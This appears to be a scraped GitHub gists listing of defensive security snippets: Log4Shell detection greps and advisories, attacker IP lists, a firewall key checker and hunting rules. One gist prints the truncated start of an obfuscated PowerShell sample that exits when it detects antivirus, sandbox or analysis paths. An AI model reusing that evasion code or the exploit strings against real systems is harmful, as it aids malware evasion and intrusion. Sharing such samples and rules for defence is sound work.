Skip to content

Instantly share code, notes, and snippets.

Listening to meowzek

Dan danzek

Listening to meowzek
View GitHub Profile
cablej / ESXi ransomware payment addresses
Last active February 26, 2023 22:32
A list of ESXi ransomware payment addresses from, collected from Censys and Shodan.
View ESXi ransomware payment addresses
LeeHolmes / Get-TwitterThread.ps1
Created November 15, 2022 17:57
Recover your Twitter threads from your Twitter export data
View Get-TwitterThread.ps1
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
View gist:352b309a576a1654c6588eb9dcba6d9d
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
rqu1 /
Last active October 29, 2022 14:02
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
class PanCrypt():
theevilbit /
Last active April 25, 2022 04:32
Download All Apple OSS Tarballs from Github
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
blotus / log4j_exploitation_attempts_crowdsec.csv
Last active March 20, 2023 19:22
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
View log4j_exploitation_attempts_crowdsec.csv
ip status country as_name validated RO Unmanaged Ltd validated KR Korea Telecom validated CA OVH SAS validated US PONYNET validated DE netcup GmbH validated ES Orange Espagne SA validated DE LUMASERV Systems validated PT Vodafone Portugal - Communicacoes Pessoais S.A. validated ES Orange Espagne SA
SwitHak /
Last active May 22, 2023 18:58
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Neo23x0 /
Last active April 12, 2023 11:09
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
wdormann / noappinstaller.reg
Last active December 14, 2021 00:30
Prevent the ability to click on a ms-appinstaller: URI for the current user
View noappinstaller.reg
Windows Registry Editor Version 5.00
"URL Protocol"=-
View EQL hunt for Potential Macro on close
sequence by with maxspan=1s
[process where event.action : "creation_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id